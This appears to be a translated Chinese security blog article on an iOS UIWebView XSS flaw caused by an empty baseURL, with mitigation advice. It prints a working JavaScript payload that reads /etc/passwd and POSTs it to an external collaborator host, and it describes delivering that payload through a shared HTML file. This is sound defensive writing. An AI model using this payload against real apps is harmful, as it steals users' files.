iOS漏洞——Web View XSS

Posted 2021-04-29 嘶吼专业版

本文介绍一个简单的，但是潜在危险性特别大、而且在ios app中经常出现的安全漏洞。

该漏洞非常简单，但是常常被误解，当开发者在代码中是设置webView时，经常会看到：

[webView loadhtmlString:someHTMLstring baseURL:[NSURL URLWithString:@""]]

许多开发者都认为设置baseURL为@””，表示是安全的，因为baseurl被指定为空字符串，攻击者也不能加载请求到随机的恶意网站。但事实上不是这样的。

当baseURL被设置为空字符串时，攻击者可以绕过SOP保护访问APP的文件系统（使用file:// url方案）和任何外部网站。

另一个需要注意的方法是loadData:MIMEType:textEncodingName:baseURL。

错误配置可以以多种方式利用。最常见的就是文件共享，用户可以在web视图中打开文件。比如一个简单的XSS payload：

<script>

       var request = new XMLHttpRequest();

       request.open("GET","file:///etc/passwd",false);

       request.send();

request.open("POST","http://nc3fefxjk1kpku6504yvqzeyspyjm8.burpcollaborator.net",false);

       request.send(request.responseText);

</script>

这个简单的payload可以打开手机的/etc/passwd文件，然后发送其中的内容到攻击者服务器。

研究人员将其保存为.html文件，并于iCloud进行同步，然后再通过苹果的Files APP在APP内分享。

然后，当用户打开该文件时：

研究人员就接收到了用户的etc/passwd文件。

其他潜在的利用方法有：

· APP内打开URL/Web浏览：攻击者可以发送给受害者一个恶意URL，当用户点击时，就可以在APP的web视图中打开链接。

· URL scheme滥用：攻击者可以通过邮件或iMessage等外部通信方式发送一个恶意URL。如果打开链接的URL scheme在webView中，就可以进行利用。

如何应对？

应对该漏洞的最简单的办法就是将baseURL参数设置为about:blank而不是空字符串。比如：

[webView loadHTMLString:someHTMLstring baseURL:[NSURL URLWithString:@"about:blank"]]

现在webView已经从手机的文件系统中沙箱化了，攻击者可能可以进行弹窗，但是不能窃取数据或与恶意服务器进行通信。如果用户从文件系统中加载内嵌图像，该方案可能会干预APP的这一功能。

如果开发者选择使用新的WKWebView类，而不是老版本的UIWebView，那么这类攻击发生的可能性就会小很多。因为WKWebView增强了安全性，默认情况下不允许对本地文件系统进行AJAX请求，所以前面描述的攻击就都不能实现了。而且WKWebView还有一个开启/关闭javascript执行的新功能。